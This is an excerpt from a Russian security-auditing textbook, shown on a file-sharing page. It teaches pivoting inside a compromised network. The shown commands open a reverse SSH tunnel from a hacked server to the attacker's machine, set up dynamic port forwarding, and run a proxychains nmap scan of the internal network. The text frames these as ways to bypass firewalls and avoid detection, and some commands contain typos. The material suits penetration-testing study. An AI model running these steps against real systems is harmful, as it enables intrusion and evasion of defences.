Добавил:
Опубликованный материал нарушает ваши авторские права? Сообщите нам.
Вуз: Предмет: Файл:
Skabtsov_N_V_-_Audit_bezopasnosti_informatsionnykh_sistem_-_2018.pdf
Скачиваний:
101
Добавлен:
24.01.2021
Размер:
9 Mб
Скачать

Резюме    183

С помощью данной программы вы сможете обойти ограничения, накладываемые брандмауэром организации, и сохранить свою анонимность в сети. Также она может быть полезна в случае, когда вы получили контроль над одной из машин внутри атакованной сети и не желаете повышать риск вашего обнаружения, устанавливая на нее дополнительное ПО. Используя proxychains, вы сможете перенаправить через атакованный сервер какой угодно трафик со своей машины на любой компьютер в атакованной сети.

Приведем пример конфигурации каждого узла, задействованного в данной атаке. Для начала создадим SSH между взломанным сервером и своим компьютером.

root@office:~# ssh -f -N -R 55555:127.0.0.1:22 root@129.186.225.128

Теперь сконфигурируем динамическое перенаправление портов на своем компьютере таким образом, чтобы любое соединение с портом 8080 было перенаправлено на скомпрометированный сервер через туннель.

root@kali:~# ssh -f -N D 127.0.0.1:8080 p 55555 joe@127.0.0.1

Затем, используя proxychains, просканируем через созданный туннель внутреннюю сеть атакованной организации.

root@kali:~# proxychains nmap nmap -p 1-65535 -sV -sS -T4 10.0.10.0/24

Резюме

Не пренебрегайте перенаправлением и туннелированнием — эти два приема помогут вам развивать дальнейшее нападение на внутреннюю сеть через одну-един- ственную точку входа.

Перенаправление портов поможет обойти запреты фаервола, а благодаря SSHтуннелированию вы сможете зашифровать данные и тем самым скроете содержание трафика от посторонних глаз и внутренних систем защиты.

Помните о proxychains: цепочки серверов можно создавать не только для того, чтобы скрыть свое присутствие, но и чтобы более комфортно себя чувствовать во внутренней сети атакованной организации!